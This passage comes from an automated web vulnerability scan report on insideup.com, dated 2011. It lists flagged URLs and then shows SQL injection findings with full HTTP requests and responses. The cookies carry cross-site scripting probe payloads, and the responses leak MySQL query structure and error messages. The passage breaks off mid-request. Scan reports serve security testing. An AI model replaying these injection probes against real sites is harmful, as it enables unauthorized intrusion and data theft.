2.918. http://www.insideup.com/wiki/Immigrant_Law [name of an arbitrarily supplied request parameter]

2.919. http://www.insideup.com/wiki/Import/Export_Services [REST URL parameter 2]

2.920. http://www.insideup.com/wiki/Import/Export_Services [REST URL parameter 3]

2.921. http://www.insideup.com/wiki/Import/Export_Services [name of an arbitrarily supplied request parameter]

2.922. http://www.insideup.com/wiki/Import/Netsparkerf4bf363ef9494a43b467156dc7227069 [name of an arbitrarily supplied request parameter]

2.923. http://www.insideup.com/wiki/Import/Netsparkerf4bf363ef9494a43b467156dc7227069 [name of an arbitrarily supplied request parameter]

2.924. http://www.insideup.com/wiki/Intellectual_Property [REST URL parameter 2]

2.925. http://www.insideup.com/wiki/Intellectual_Property [name of an arbitrarily supplied request parameter]

2.926. http://www.insideup.com/wiki/Intellectual_Property [name of an arbitrarily supplied request parameter]

2.927. http://www.insideup.com/wiki/Labor_Law [REST URL parameter 2]

2.928. http://www.insideup.com/wiki/Labor_Law [name of an arbitrarily supplied request parameter]

2.929. http://www.insideup.com/wiki/Labor_Law [name of an arbitrarily supplied request parameter]

2.930. http://www.insideup.com/wiki/Liability_Insurance [name of an arbitrarily supplied request parameter]

2.931. http://www.insideup.com/wiki/Liability_Insurance [name of an arbitrarily supplied request parameter]

2.932. http://www.insideup.com/wiki/Logo_Design [REST URL parameter 2]

2.933. http://www.insideup.com/wiki/Promotional_Products [REST URL parameter 2]

2.934. http://www.insideup.com/wiki/Promotional_Products [name of an arbitrarily supplied request parameter]

2.935. http://www.insideup.com/wiki/Promotional_Products [name of an arbitrarily supplied request parameter]

2.936. http://www.insideup.com/wiki/Public_Relations [name of an arbitrarily supplied request parameter]

2.937. http://www.insideup.com/wiki/Shipping/Freight_Services [REST URL parameter 2]

2.938. http://www.insideup.com/wiki/Shipping/Freight_Services [REST URL parameter 2]

2.939. http://www.insideup.com/wiki/Shipping/Freight_Services [REST URL parameter 3]

2.940. http://www.insideup.com/wiki/Shipping/Freight_Services [name of an arbitrarily supplied request parameter]

2.941. http://www.insideup.com/wiki/Shipping/Freight_Services [name of an arbitrarily supplied request parameter]

2.942. http://www.insideup.com/wiki/Shipping/Netsparker45e09a11e64c44a79cf4a9f9452528a8 [REST URL parameter 2]

2.943. http://www.insideup.com/wiki/Warehouse/Storage_Services [REST URL parameter 2]

2.944. http://www.insideup.com/wiki/Warehouse/Storage_Services [name of an arbitrarily supplied request parameter]

2.945. http://www.insideup.com/wiki/Warehouse/Storage_Services [name of an arbitrarily supplied request parameter]

2.946. http://www.insideup.com/communitysignup.html [Referer HTTP header]

2.947. http://www.insideup.com/login.html [Referer HTTP header]



1. SQL injection  next
There are 1128 instances of this issue:


1.1. http://www.insideup.com/ppc/Marketing_Articles/How_Do_You_Pay_For_Leads.html [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/Marketing_Articles/How_Do_You_Pay_For_Leads.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/Marketing_Articles'/How_Do_You_Pay_For_Leads.html HTTP/1.1
Referer: http://www.insideup.com/marketingarticles.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=5BFB6E485A4D0B2638C70D220E88195F; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:01:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=g239udp24ra59hpikb8l9f93i0; path=/
Content-Length: 2198
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
p grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'Marketing_Articles'/How_Do_You_Pay_For_Leads.html' OR prj.project_page_url = 'Marketing_Articles'/How_Do_You_Pay_For_Leads.html/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'Marketing_Articles'/How_Do_You_Pay_For_Leads.html/'' at line 5

Request 2

GET /ppc/Marketing_Articles''/How_Do_You_Pay_For_Leads.html HTTP/1.1
Referer: http://www.insideup.com/marketingarticles.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=5BFB6E485A4D0B2638C70D220E88195F; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 04:01:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gg0krfs6buajv3l8uqllc42nu0; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/Marketing_Articles''/How_Do_You_Pay_For_Leads.html was not found on this server.</p>

1.2. http://www.insideup.com/ppc/Marketing_Articles/How_Do_You_Pay_For_Leads.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/Marketing_Articles/How_Do_You_Pay_For_Leads.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/Marketing_Articles/How_Do_You_Pay_For_Leads.html' HTTP/1.1
Referer: http://www.insideup.com/marketingarticles.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=5BFB6E485A4D0B2638C70D220E88195F; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:01:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qd1ncpqcd25p1hq7pp9tvr2nf3; path=/
Content-Length: 2198
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
p grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'Marketing_Articles/How_Do_You_Pay_For_Leads.html'' OR prj.project_page_url = 'Marketing_Articles/How_Do_You_Pay_For_Leads.html'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Marketing_Articles/How_Do_You_Pay_For_Leads.html'/'
   union select prj.catId,prj.' at line 5

Request 2

GET /ppc/Marketing_Articles/How_Do_You_Pay_For_Leads.html'' HTTP/1.1
Referer: http://www.insideup.com/marketingarticles.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=5BFB6E485A4D0B2638C70D220E88195F; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 